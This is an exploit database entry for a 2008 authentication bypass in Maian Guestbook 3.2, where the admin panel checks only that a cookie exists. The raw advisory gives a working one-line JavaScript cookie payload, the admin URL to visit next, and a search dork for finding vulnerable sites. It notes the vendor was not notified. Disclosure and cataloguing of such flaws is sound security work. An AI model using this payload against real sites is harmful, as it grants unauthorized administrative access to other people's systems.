header-logo
Suggest Exploit
vendor:
Maian Guestbook
by:
S.W.A.T.
7.5
CVSS
HIGH
Insecure Cookie Handling
613
CWE
Product Name: Maian Guestbook
Affected Version From: 3.2
Affected Version To: 3.2
Patch Exists: NO
Related CWE: N/A
CPE: a:maian_scripts:maian_guestbook
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability

Maian Guestbook suffers from a insecure cookie, the admin panel only checks if the cookie exists and not the content. So, an attacker can craft a cookie and look like a admin.

Mitigation:

Ensure that the cookie content is validated before allowing access to the admin panel.
Source

Exploit-DB raw data:

-[*]+================================================================================+[*]-
-[*]+          Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability         +[*]-
-[*]+================================================================================+[*]-



[*] Discovered By: S.W.A.T.
[*] E-Mail: svvateam[at]yahoo[dot]com
[*] Script Download: http://www.maianscriptworld.co.uk
[*] DORK: Powered by Maian Guestbook v3.2



[*] Vendor Has Not Been Notified!



[*] DESCRIPTION:

   Maian Guestbook suffers from a insecure cookie, the admin panel only checks if the

cookie exists.
    and not the content. so we can easyily craft a cookie and look like a admin.



[*] Vulnerability:

    javascript:document.cookie = "gbook_cookie=1; path=/";


[*] NOTE/TIP:

    after running the javascript, visit "/admin/index.php" to view admin area.



-[*]+================================================================================+[*]-
-[*]+          Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability         +[*]-
-[*]+================================================================================+[*]-

# milw0rm.com [2008-07-13]